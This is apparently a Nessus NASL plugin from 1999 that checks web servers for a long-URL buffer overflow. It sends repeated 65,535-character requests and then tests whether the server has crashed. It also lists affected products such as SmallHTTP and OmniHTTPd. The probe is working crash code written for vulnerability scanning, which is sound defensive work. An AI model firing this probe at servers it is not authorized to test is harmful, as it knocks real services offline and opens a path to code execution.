#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
# Some vulnerable servers:
# SmallHTTP (All versions vulnerable: 2.x Stables, 3.x Latest beta 8)
# OmniHTTPd v2.09 of Omnicron (www.omnicron.ca)
# MyWebServer 1.02
# atphttpd-0.4b ?
# IBM Tivoli Management Framework < Currently Fixpack 2 or Patches
#  3.7.1-TMF-0066
#  LCFD process - default port 9495)
# IBM Tivoli Management Framework 3.6.x through 3.7.1 (fixed in 4.1)
#  Spider process - default port 94 redirected to another port.
# Access Point IP Services Router (Formerly known as Xedia Router)
# Oracle9iAS Web Cache/2.0.0.1.0
# 

if(description)
{
 script_id(10320);
 script_version ("$Revision: 1.24 $");
 
 name["english"] = "Too long URL";
 name["francais"] = "URL trop longue";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "
It may be possible to make a web server execute
arbitrary code by sending it a too long url. 

Risk factor : High

Solution : Upgrade your web server.";

 desc["francais"] = "
 
Il est peut etre possible de faire executer du code arbitraire
 un serveur web en lui envoyant une URL trop longue.

Facteur de risque : Elev

Solution : Mettez  jour votre serveur web.";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Web server buffer overflow";
 summary["francais"] = "Dpassement de buffer dans un serveur web";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_MIXED_ATTACK); # mixed
 
 
 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
 family["english"] = "Gain root remotely";
 family["francais"] = "Passer root  distance";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes");
  script_require_ports("Services/www",80);
 exit(0);
}

#
# The script code starts here
#

# This is a generic check, so if safe_checks is enabled
# we just bail out.
if(safe_checks())
{ 
 exit(0);
}

port = get_kb_item("Services/www");
if(!port)port = 80;
if (! get_port_state(port)) exit(0);

sock = open_sock_tcp(port);
if (! sock) exit(0);

mystr = http_get(item:"/", port:port);
send(socket:sock, data:mystr);
rcv = recv(socket:sock, length:1024);
if(!rcv) exit(0);
close(sock);

# vWebServer and Small HTTP are vulnerable *if* the URL is requested 
# a couple of times. Ref: VULN-DEV & BUGTRAQ (2001-09-29)
for (i = 0; i < 5; i = i + 1)
{
soc = open_sock_tcp(port);
if(soc)
{
req = string("/", crap(65535));
req = http_get(item:req, port:port);
send(socket:soc, data:req);
close(soc);
}
}

sleep(1);

soc2 = open_sock_tcp(port);
if(!soc2){
	security_hole(port);
	set_kb_item(name:"www/too_long_url_crash", value:TRUE);
	exit(0);
	}
req = http_get(item:"/", port:port);
send(socket:soc2, data:req);
r = recv(socket:soc2, length:1024);
close(soc2);

if(!r){
	security_hole(port);
	set_kb_item(name:"www/too_long_url_crash", value:TRUE);
      }



